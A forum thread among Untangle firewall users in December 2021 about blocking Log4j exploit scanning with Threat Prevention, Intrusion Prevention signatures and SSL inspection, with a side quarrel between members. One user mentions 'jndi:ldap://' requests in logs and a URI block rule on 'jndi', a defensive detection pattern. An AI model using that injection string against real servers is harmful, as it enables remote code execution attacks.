LinkBack URL
About LinkBacksThis is what my nessus scan of ngfw looks like, no CVE-2021-44228, but.....
Nessus Scan.png
This is what my nessus scan of ngfw looks like, no CVE-2021-44228, but.....
Nessus Scan.png
We had issues with it in the beginning and a few tickets every month when some cloud platform gets there ip in the high risk category.Originally Posted by dashpuppy
But in hole it do more good then damage at the moment.
I just have to make alot of exceptions is all ! Like youtube ? Or my Aruba Portal was blocked.. etc etc..
Started Youtube Channel, Have a question about Untangle Ask me : jason @ jasonslab.ca
https://www.youtube.com/c/jasonslabvideos << Please like and subscribe, helps me out !!
Nope, just let it ride and make the exceptions you need. It's really handy for protecting web servers because it filters out a bucket of log4j scanning right now.
Which is a ton more useful than an intrusion prevention module that cannot see the URI string to do anything!
Rob Sandling, BS:SWE, MCP
NexgenAppliances.com
Phone: 866-794-8879 x201
Email: support@nexgenappliances.com
Id ask you to share an example / screen shot but, you would probably submit another @hole response like the one in the direct PM.
Started Youtube Channel, Have a question about Untangle Ask me : jason @ jasonslab.ca
https://www.youtube.com/c/jasonslabvideos << Please like and subscribe, helps me out !!
Was that before or after you spammed me twice with a request that I go into more detail about which I was quite clear once already?
Oh... and for FREE I might add. I have kids to feed, I get PAID for professional tech support.
You were quite rude, I responded bluntly but appropriately. And now you come here to air dirty laundry in public? How classy!
Seriously, and all over a 1 line rule?
It seems to me that you want to use my knowledge and experience for your own gain, but only when I give it away in tiny personalized bite sized pieces for free. You want more for free, go read the wiki. It has all you need to answer both questions, in less than 1 paragraph.
Last edited by sky-knight; 12-17-2021 at 01:40 PM.
Rob Sandling, BS:SWE, MCP
NexgenAppliances.com
Phone: 866-794-8879 x201
Email: support@nexgenappliances.com
Be nice folks. It's the holidays for goodwill to all people.
Attention: Support and help on the Untangle Forums is provided by
volunteers and community members like yourself.
If you need Untangle support please call or email support@untangle.com
I must be doing something wrong. I have Intrusion Prevention set to block the 46 signatures that contain log4j, yet I see nothing getting blocked. When I look at my modsecurity logs I still see a lot of the jndi:ldap:// type of requests. It's like it's skipping right past Intrusion Prevention.
EDIT: Ok, realized it's Threat Prevention people are speaking of, but still can't get it. For example, I did a rule to block URI is jndi. However, that went right through on a test.
Last edited by sspeed; 12-17-2021 at 02:59 PM.
No, you have Intrusion Prevention configured correctly if you have those rules set to block. The problem is the module will never see the URI field because all the traffic is encrypted. You have to use SSL inspector to terminate the SSL inbound on Untangle, and then forward on the traffic to the web server. This reality is a bit cumbersome to deal with on NGFW, which is why Untangle has a new Web Application Firewall product.I must be doing something wrong. I have Intrusion Prevention set to block the 46 signatures that contain log4j, yet I see nothing getting blocked. When I look at my modsecurity logs I still see a lot of the jndi:ldap:// type of requests. It's like it's skipping right past Intrusion Prevention.
EDIT: Ok, realized it's Threat Prevention people are speaking of, but still can't get it. For example, I did a rule to block URI is jndi. However, that went right through on a test.
That being said, I recommend use of Policy Manager to direct all ingress web traffic on NGFW to its own policy, from there you can install a curated list of modules. Threat Prevention in this policy is a risk... you WILL have to keep a close eye on it. However, if you deploy Threat Prevention in such a way that it's responsible for ingress web traffic, it will control traffic based on the reputations of the IPs in question. The addresses that are abusing our web servers with these exploit attempts are largely crap, so Threat Prevention behaves accordingly. This in turns cleans up your web access logs.
I'm using it on my public website, as well as my RMM currently. It's not great at times because the locations my agents are checking in from often also have terrible reputations. For these locations I use IP address in a policy rule to push the traffic to yet another policy that doesn't have Threat Prevention. Basically I have a single policy rule that has a growing list of IP addresses in it. Occasionally I just delete them all and start over.
P.S. If you decide to use Threat Prevention on your own web content, there's a check box under it's advanced tab you're going to want to enable.
Last edited by sky-knight; 12-17-2021 at 03:21 PM.
Rob Sandling, BS:SWE, MCP
NexgenAppliances.com
Phone: 866-794-8879 x201
Email: support@nexgenappliances.com
I think this is the way: at 28:40 change the rule to Log4j
https://www.youtube.com/watch?v=o36ep-u-Ayo
